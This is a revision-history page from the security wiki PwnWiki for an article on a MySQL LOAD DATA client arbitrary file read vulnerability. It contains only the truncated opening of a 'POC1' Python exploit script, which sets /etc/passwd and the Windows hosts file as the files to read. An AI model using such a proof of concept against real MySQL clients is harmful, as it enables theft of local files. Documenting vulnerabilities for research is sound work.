Revision history of "Mysql LOAD DATA 客戶端任意文件讀取漏洞"

From PwnWiki

Diff selection: Mark the radio boxes of the revisions to compare and hit enter or the button at the bottom.
Legend: (cur) = difference with latest revision, (prev) = difference with preceding revision, m = minor edit.

  • curprev 15:20, 10 July 2021Pwnwiki talk contribs 10,156 bytes +10,156 Created page with "==POC1== <pre> #!/usr/bin/python #coding: utf8 import socket # linux : #filestring = "/etc/passwd" # windows: #filestring = "C:\Windows\system32\drivers\etc\hosts" HOST = "0...."